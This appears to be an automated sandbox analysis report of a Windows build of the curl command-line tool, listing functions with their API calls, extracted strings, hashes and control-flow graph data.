                                      • Opcode ID: 29ca6eedd6e6390e1dc2f895d19ce7819a36ae8a2340718d6449bec0a300babe
                                      • Instruction ID: ec787653c205d265c6892a325b053347b5f0278d3c5c38868053886b4418d6a6
                                      • Opcode Fuzzy Hash: 29ca6eedd6e6390e1dc2f895d19ce7819a36ae8a2340718d6449bec0a300babe
                                      • Instruction Fuzzy Hash: A7918162B0CA4282FB50EB25A4441AAE390FF4D7A4FC40531EE6D477D5DE3CE408E7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • getpeername.WS2_32 ref: 00007FF7F8D17BFA
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17C97
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17C9F
                                        • Part of subcall function 00007FF7F8D12C90: FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F8D12D23
                                        • Part of subcall function 00007FF7F8D12C90: __swprintf_l.LIBCMT ref: 00007FF7F8D12D43
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17D13
                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F8D17D1B
                                      • WSAGetLastError.WS2_32 ref: 00007FF7F8D17C04
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CAA
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CB2
                                        • Part of subcall function 00007FF7F8D12C90: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CC9
                                        • Part of subcall function 00007FF7F8D12C90: strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CD5
                                        • Part of subcall function 00007FF7F8D12C90: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12CE7
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D91
                                        • Part of subcall function 00007FF7F8D12C90: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12D9C
                                        • Part of subcall function 00007FF7F8D12C90: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DA5
                                        • Part of subcall function 00007FF7F8D12C90: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12DB1
                                      • getsockname.WS2_32 ref: 00007FF7F8D17C50
                                      • WSAGetLastError.WS2_32 ref: 00007FF7F8D17C5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: _errno$ErrorLast$FormatMessage__swprintf_l__sys_nerrgetpeernamegetsocknamehtonsstrerrorstrncpy
                                      • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                      • API String ID: 3284209413-670633250
                                      • Opcode ID: c6b38466c530f37faf4ed88757355d348b3aaf1595b3fb91bddf2c8d98cb8f0a
                                      • Instruction ID: fa8c943d422a086883ed1cb1619b33880cf3c731aab1e1e3ca5562c1f38375fd
                                      • Opcode Fuzzy Hash: c6b38466c530f37faf4ed88757355d348b3aaf1595b3fb91bddf2c8d98cb8f0a
                                      • Instruction Fuzzy Hash: 44519361A08A8686FB10BB35E4402F9F361EF4CB94F844032DA6D0769ADF3CE54DD7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2797 7ff7f8d0cfc4-7ff7f8d0d015 2798 7ff7f8d0d01b-7ff7f8d0d030 2797->2798 2799 7ff7f8d0d0a5-7ff7f8d0d0ab 2797->2799 2802 7ff7f8d0d068-7ff7f8d0d093 call 7ff7f8d0f868 call 7ff7f8d0fc24 2798->2802 2803 7ff7f8d0d032 2798->2803 2800 7ff7f8d0d0ad-7ff7f8d0d0b6 2799->2800 2801 7ff7f8d0d10f-7ff7f8d0d150 call 7ff7f8d0f868 call 7ff7f8d0fc24 2799->2801 2806 7ff7f8d0d0b8-7ff7f8d0d0d9 2800->2806 2807 7ff7f8d0d0db-7ff7f8d0d0de 2800->2807 2827 7ff7f8d0d153-7ff7f8d0d15c 2801->2827 2824 7ff7f8d0d098-7ff7f8d0d0a0 2802->2824 2808 7ff7f8d0d035-7ff7f8d0d038 2803->2808 2811 7ff7f8d0d103-7ff7f8d0d10d call 7ff7f8d0fc24 2806->2811 2812 7ff7f8d0d0fe 2807->2812 2813 7ff7f8d0d0e0-7ff7f8d0d0e2 2807->2813 2814 7ff7f8d0d03b-7ff7f8d0d047 2808->2814 2811->2827 2812->2811 2817 7ff7f8d0d0ef-7ff7f8d0d0fc 2813->2817 2818 7ff7f8d0d0e4-7ff7f8d0d0ed 2813->2818 2819 7ff7f8d0d049-7ff7f8d0d04f 2814->2819 2820 7ff7f8d0d051-7ff7f8d0d054 2814->2820 2817->2811 2818->2811 2819->2814 2819->2820 2825 7ff7f8d0d064 2820->2825 2826 7ff7f8d0d056-7ff7f8d0d060 2820->2826 2824->2827 2825->2802 2826->2808 2828 7ff7f8d0d062 2826->2828 2829 7ff7f8d0d15e-7ff7f8d0d161 2827->2829 2830 7ff7f8d0d1c4-7ff7f8d0d1f2 free call 7ff7f8d48290 2827->2830 2828->2802 2829->2830 2832 7ff7f8d0d163-7ff7f8d0d165 2829->2832 2832->2830 2834 7ff7f8d0d167-7ff7f8d0d16a 2832->2834 2835 7ff7f8d0d17c-7ff7f8d0d17f 2834->2835 2836 7ff7f8d0d16c-7ff7f8d0d17a 2834->2836 2838 7ff7f8d0d1a9-7ff7f8d0d1b0 2835->2838 2839 7ff7f8d0d181-7ff7f8d0d18f call 7ff7f8d0c748 2835->2839 2837 7ff7f8d0d1b7 2836->2837 2840 7ff7f8d0d1ba-7ff7f8d0d1c2 call 7ff7f8d02cbc 2837->2840 2838->2837 2845 7ff7f8d0d191-7ff7f8d0d194 2839->2845 2846 7ff7f8d0d196-7ff7f8d0d1a7 2839->2846 2840->2830 2845->2830 2846->2840
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __swprintf_l$free
                                      • String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
                                      • API String ID: 1144208884-2562657978
                                      • Opcode ID: 8fe7eb776271953c1b8705befa5fbaa6a8eab7dc0b8f06851b4383da22a8a0e0
                                      • Instruction ID: 971a2295a7f24fa109fb8a3c13fa5fb3e0530763504bb4f208f72d6f10d598dc
                                      • Opcode Fuzzy Hash: 8fe7eb776271953c1b8705befa5fbaa6a8eab7dc0b8f06851b4383da22a8a0e0
                                      • Instruction Fuzzy Hash: C351C421A0C64641FB21FB11A4506B9E761AF8CB84FD40132DE3D876D9EE3CE54EA3A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C18
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C31
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CA8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CC8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CE8
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D10
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D39
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D70
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D9E
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19DBE
                                        • Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D19DE0,?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D4155D
                                        • Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D4159E
                                        • Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415B9
                                        • Part of subcall function 00007FF7F8D41538: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D415D4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E03
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E23
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19E95
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free
                                      • String ID:
                                      • API String ID: 1294909896-0
                                      • Opcode ID: 387dcd9767ec118bef3c125f5e000aa80d5e48e86f399106eb2fda1ef2e482db
                                      • Instruction ID: 61cce2261e8db540f00f42246246747acb0ba4deec0240b58462b67f09fed3fc
                                      • Opcode Fuzzy Hash: 387dcd9767ec118bef3c125f5e000aa80d5e48e86f399106eb2fda1ef2e482db
                                      • Instruction Fuzzy Hash: A481DD25709A8596EB08BF31FA502B8E364FF99B44F880135CB6E47791CF3CE4249798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B4C8
                                        • Part of subcall function 00007FF7F8D0C0E4: __swprintf_l.LIBCMT ref: 00007FF7F8D0C18B
                                        • Part of subcall function 00007FF7F8D0C0E4: fopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C19C
                                        • Part of subcall function 00007FF7F8D0C0E4: fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C1AA
                                        • Part of subcall function 00007FF7F8D0C0E4: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D0C220
                                        • Part of subcall function 00007FF7F8D0C0E4: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0C23F
                                        • Part of subcall function 00007FF7F8D0C0E4: isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F8D0C294
                                      • puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B550
                                      • puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D0B58B
                                        • Part of subcall function 00007FF7F8D077B0: fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000000,00000000,00007FF7F8D06C5B), ref: 00007FF7F8D077DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: puts$__acrt_iob_func__swprintf_lfclosefopenfputsfreeisspace
                                      • String ID: %s$ <none>$ %-19s %s$--disable$Build-time engines:$Usage: curl [options...] <url>
                                      • API String ID: 2654287025-3729519285
                                      • Opcode ID: 6eecec63d56d8383e871afb94dbd392f88befcf3364330901c7de097aa842dbf
                                      • Instruction ID: 8abf9cdfaf096a17ebdde02f7055e088fd7a689017c7b32906fdbd848bfe4bc6
                                      • Opcode Fuzzy Hash: 6eecec63d56d8383e871afb94dbd392f88befcf3364330901c7de097aa842dbf
                                      • Instruction Fuzzy Hash: 81414F21A0D64380EF14BB55E4901B9D361EF9C794FD44433D93E8B6E9DE2CE84DA3A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: __acrt_iob_func$free$CleanupStartupfputs
                                      • String ID: error initializing curl easy handle$error initializing curl library$error retrieving curl library information$R?
                                      • API String ID: 677633667-495523140
                                      • Opcode ID: ee4cfaade065980af47ce4981af93ebbc7ed4b0955015e0771d177f477442d26
                                      • Instruction ID: f9a0e32436071bca2ac1ade3069f7c92caba2e6145400617b033a105eb839c9e
                                      • Opcode Fuzzy Hash: ee4cfaade065980af47ce4981af93ebbc7ed4b0955015e0771d177f477442d26
                                      • Instruction Fuzzy Hash: 58414D21A09A4685F710AB75D4543ACE7A1AF4C758F940235CA3D4A3D9DF3DD408D7B4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: fopenstrerror$_errnofclose
                                      • String ID: Failed to create the file %s: %s$Refusing to overwrite %s: %s$Remote filename has no length!
                                      • API String ID: 729476436-2765071892
                                      • Opcode ID: 3c5bfdb4c7f10f03be92168e0fe2d542fc42eb61b4fd08e665704bce8ff2df22
                                      • Instruction ID: c5d356d0ce2f17311910fce9d64aed5e0e3f0db3a6b780f14afe232c83169617
                                      • Opcode Fuzzy Hash: 3c5bfdb4c7f10f03be92168e0fe2d542fc42eb61b4fd08e665704bce8ff2df22
                                      • Instruction Fuzzy Hash: 03213C61A0EA4695EF14BB64D444378E360EF4CB88F884075CA2D062E9DF6CE44DE3AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$Sleepselect
                                      • String ID:
                                      • API String ID: 2806104629-0
                                      • Opcode ID: 3561fc7a812f69438ee48fef225d331526076c44cfc2bde893fe9ced1ef55597
                                      • Instruction ID: d41e4b5a014d00deac8a89b1968f337acfcdeb5528f8d37eed71aeeb18cdf26e
                                      • Opcode Fuzzy Hash: 3561fc7a812f69438ee48fef225d331526076c44cfc2bde893fe9ced1ef55597
                                      • Instruction Fuzzy Hash: E5B14832F09A824BF764EF399840679E291BF487B4F900234E93E46BC4DE3CD9489794
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$select
                                      • String ID:
                                      • API String ID: 1043644060-0
                                      • Opcode ID: 73d85b4132bb218b28ee479f4becfc568b41c399f32ee85f408b58f739fc2532
                                      • Instruction ID: ecde4ffaa371a93896d448d6c5b4ea749f4c57c11317de8610f4e53346a36154
                                      • Opcode Fuzzy Hash: 73d85b4132bb218b28ee479f4becfc568b41c399f32ee85f408b58f739fc2532
                                      • Instruction Fuzzy Hash: 8EB12932B18A4286FB699F38D844279E291FF48768FD04234EA3E476C4DF3DD9489754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FreeLibrary.KERNELBASE ref: 00007FF7F8D0723F
                                      • WSACleanup.WS2_32 ref: 00007FF7F8D07264
                                      • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F8D07276
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D07294
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D072AD
                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F8D072C6
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D072D4
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D072F9
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C18
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19C31
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CA8
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CC8
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19CE8
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D10
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D39
                                        • Part of subcall function 00007FF7F8D19B98: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F8D071E6), ref: 00007FF7F8D19D70
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$FreeLibraryfclose$Cleanup
                                      • String ID:
                                      • API String ID: 2673440117-0
                                      • Opcode ID: 174b2a87244909aad4b614c749556b912e5266a4113f4507843e47c2b711e0fe
                                      • Instruction ID: f3a8f5389497529abbf17749502fbe8e8d992b885498304d312d27cc269ac2cf
                                      • Opcode Fuzzy Hash: 174b2a87244909aad4b614c749556b912e5266a4113f4507843e47c2b711e0fe
                                      • Instruction Fuzzy Hash: 15413925A0DB469AEB54BF61A540139F3A0FF48B50B880134DA7D07AD4DF3CF468A7A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: After %ldms connect time, move on!$Connection failed$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                      • API String ID: 0-885759404
                                      • Opcode ID: 82d754e653b3492412b34b188de4ad869d8e0f2d8313cdde9b12904d9b0dc2fe
                                      • Instruction ID: a7749f7a7056b42b0bfd2174c79b772803b141d22fc5464bddcc6057e2654f46
                                      • Opcode Fuzzy Hash: 82d754e653b3492412b34b188de4ad869d8e0f2d8313cdde9b12904d9b0dc2fe
                                      • Instruction Fuzzy Hash: BBB1F662B18E8685FB54EB34D4013BDE391AF4CBA4F844231DD2D5B6DADF38A44893A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: callocfree
                                      • String ID: %s in column %zu$curl: (%d) [globbing] %s
                                      • API String ID: 306872129-219423104
                                      • Opcode ID: 4efe587bfeece8c1cc13e8ce50d2900fac93f9f32395f61d8d9a2790e96ce83b
                                      • Instruction ID: cf69dc80db7b3f5574106c4bcdf041185eef0fee945110e52985a2ebac6de9d5
                                      • Opcode Fuzzy Hash: 4efe587bfeece8c1cc13e8ce50d2900fac93f9f32395f61d8d9a2790e96ce83b
                                      • Instruction Fuzzy Hash: 0F31C42260978585FB50AF12A800BB9E3A0FF48BA4F944232DE7D873C8DF3CD4099764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: ErrorIoctlLastsetsockopt
                                      • String ID: Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d
                                      • API String ID: 1819429192-277924715
                                      • Opcode ID: 3587e944e59aea701963ff8685b268f20a61caef4aa2bed2de41810305338489
                                      • Instruction ID: ac0f3761e86360aa8c62d9659387e99078b070a16cbfc2cf839060460ec1ca1f
                                      • Opcode Fuzzy Hash: 3587e944e59aea701963ff8685b268f20a61caef4aa2bed2de41810305338489
                                      • Instruction Fuzzy Hash: 77218F72A0CA8186E7109B64F44136EE7A0EF8DBA4F544135EA6D8AA99CF7CD048CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13A23
                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F8D13A43
